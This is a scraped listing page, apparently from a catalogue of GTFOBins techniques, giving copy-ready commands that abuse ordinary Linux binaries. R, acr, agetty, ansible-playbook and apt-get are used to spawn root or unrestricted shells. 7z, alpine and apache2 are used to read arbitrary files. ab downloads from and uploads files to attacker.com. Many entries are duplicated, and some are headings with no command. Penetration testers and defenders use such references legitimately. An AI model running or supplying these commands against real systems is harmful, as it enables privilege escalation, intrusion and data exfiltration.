2885 of 2885 techniques
›
7z file-read
GTFOBins File Read Privilege Escalation Linux
7z a -ttar -an -so /path/to/input-file | 7z e -ttar -si -so
copy
›
7z file-read
GTFOBins File Read Linux
7z a -ttar -an -so /path/to/input-file | 7z e -ttar -si -so
copy
›
R shell
GTFOBins Execution Privilege Escalation Linux
R --no-save -e 'system("/bin/sh")'
copy
›
R shell
GTFOBins Execution Privilege Escalation Linux
R --no-save -e 'system("/bin/sh")'
copy
›
R shell
GTFOBins Execution Linux
R --no-save -e 'system("/bin/sh")'
copy
›
aa-exec shell
GTFOBins Execution Privilege Escalation Linux
›
aa-exec shell
GTFOBins Execution Privilege Escalation Linux
›
aa-exec shell
GTFOBins Execution Linux
›
ab download
GTFOBins File Download Privilege Escalation Linux
ab -v2 http://attacker.com/path/to/input-file
copy
›
ab download
GTFOBins File Download Privilege Escalation Linux
ab -v2 http://attacker.com/path/to/input-file
copy
›
ab download
GTFOBins File Download Linux
ab -v2 http://attacker.com/path/to/input-file
copy
›
ab upload
GTFOBins File Upload Privilege Escalation Linux
ab -p /path/to/input-file http://attacker.com/
copy
›
ab upload
GTFOBins File Upload Privilege Escalation Linux
ab -p /path/to/input-file http://attacker.com/
copy
›
ab upload
GTFOBins File Upload Linux
ab -p /path/to/input-file http://attacker.com/
copy
›
acr command
GTFOBins Execution Privilege Escalation Linux
echo -e 'x:\n\t/bin/sh 1>&0 2>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
acr -r ./relative/path/to/temp-file
copy
›
acr command
GTFOBins Execution Privilege Escalation Linux
echo -e 'x:\n\t/bin/sh 1>&0 2>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
acr -r ./relative/path/to/temp-file
copy
›
acr command
GTFOBins Execution Linux
echo -e 'x:\n\t/bin/sh 1>&0 2>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
acr -r ./relative/path/to/temp-file
copy
›
agetty shell
GTFOBins Execution Privilege Escalation Linux
agetty -l /bin/sh -o -p -a root tty
copy
›
alpine file-read
GTFOBins File Read Privilege Escalation Linux
alpine -F /path/to/input-file
copy
›
alpine file-read
GTFOBins File Read Privilege Escalation Linux
alpine -F /path/to/input-file
copy
›
alpine file-read
GTFOBins File Read Linux
alpine -F /path/to/input-file
copy
›
ansible-playbook shell
GTFOBins Execution Privilege Escalation Linux
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file
ansible-playbook /path/to/temp-file
copy
›
ansible-playbook shell
GTFOBins Execution Linux
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file
ansible-playbook /path/to/temp-file
copy
›
ansible-test shell
GTFOBins Execution Privilege Escalation Linux
›
ansible-test shell
GTFOBins Execution Linux
›
aoss shell
GTFOBins Execution Privilege Escalation Linux
›
aoss shell
GTFOBins Execution Linux
›
apache2 file-read
GTFOBins File Read Privilege Escalation Linux
apache2 -f /path/to/input-file
copy
›
apache2 file-read
GTFOBins File Read Privilege Escalation Linux
apache2 -f /path/to/input-file
copy
›
apache2 file-read
GTFOBins File Read Linux
apache2 -f /path/to/input-file
copy
›
apache2 file-read
GTFOBins File Read Privilege Escalation Linux
apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'
copy
›
apache2 file-read
GTFOBins File Read Privilege Escalation Linux
apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'
copy
›
apache2 file-read
GTFOBins File Read Linux
apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'
copy
›
apache2ctl file-read
GTFOBins File Read Privilege Escalation Linux
apache2ctl -c 'Include /path/to/input-file'
copy
›
apache2ctl file-read
GTFOBins File Read Linux
apache2ctl -c 'Include /path/to/input-file'
copy
›
apport-cli inherit ← less
GTFOBins Execution File Read File Write Linux
›
apt-get inherit ← less
GTFOBins Execution File Read File Write Privilege Escalation Linux
apt-get changelog apt
copy
›
apt-get inherit ← less
GTFOBins Execution File Read File Write Linux
apt-get changelog apt
copy
›
apt-get shell
GTFOBins Execution Privilege Escalation Linux
echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' >/path/to/temp-file
apt-get -y install -c /path/to/temp-file sl
copy
›
apt-get shell
GTFOBins Execution Privilege Escalation Linux
echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' >/path/to/temp-file
apt-get -y install -c /path/to/temp-file sl
copy
Show 40 more · 2845 remaining